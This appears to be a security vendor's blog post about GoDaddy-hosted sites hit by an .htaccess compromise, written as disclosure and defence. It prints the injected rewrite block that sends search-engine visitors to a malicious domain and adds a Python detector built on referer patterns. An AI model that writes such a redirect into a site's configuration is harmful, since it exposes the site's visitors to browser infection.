We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]
What is going on?
These redirection attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy-hosted sites. So it looks like a compromise of their own servers (similar to what has happened in the past).
What happens to anyone visiting these hacked sites?
The malware checks whether anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and, if they are, redirects them to that domain (sokoloperkovuskeci.com). From there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site ASAP to protect your own users.
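To check your own .htaccess files for this pattern, the sketch below flags any RewriteRule that redirects search-engine referrals to a host you do not own. It is an added example, not Sucuri's scanner code; the function name, the `own_hosts` parameter, the search-engine keyword list, and the sample file (including the `redirect-target.example` host) are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Keywords taken from the referer patterns in the injected block (heuristic).
SEARCH_HINTS = ("google", "bing", "yahoo", "msn", "ask", "aol", "live",
                "altavista", "excite")
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

# Constructed sample: one benign canonical-host redirect, one injected block.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://redirect-target.example/in.php?g=1 [R,L]
"""


def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, target_host, engines) for each RewriteRule that sends
    search-engine referrals to a host not listed in own_hosts."""
    findings, engines = [], set()
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # commented-out directives are inactive
        cond = COND.match(line)
        if cond:
            pattern = cond.group(1).lower()
            engines.update(h for h in SEARCH_HINTS if h in pattern)
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        target, flags = rule.group(1), (rule.group(2) or "").upper()
        host = (urlparse(target).hostname or "").lower()
        is_redirect = any(f.strip().startswith("R") for f in flags.split(","))
        if engines and host and is_redirect and host not in own_hosts:
            findings.append((no, host, sorted(engines)))
        engines = set()  # RewriteCond lines apply only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for line_no, host, engines in find_referer_redirects(SAMPLE):
        print(f"line {line_no}: referrals from {engines} redirected to {host}")
```

Run it over every .htaccess in the account, including those in parent directories, since `RewriteOptions inherit` pulls in rules from the parent configuration.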
Need help?
You can scan your site here: sitecheck.sucuri.net to see if it is compromised. If you need someone to clean it up for you, sign up here: Sucuri Signup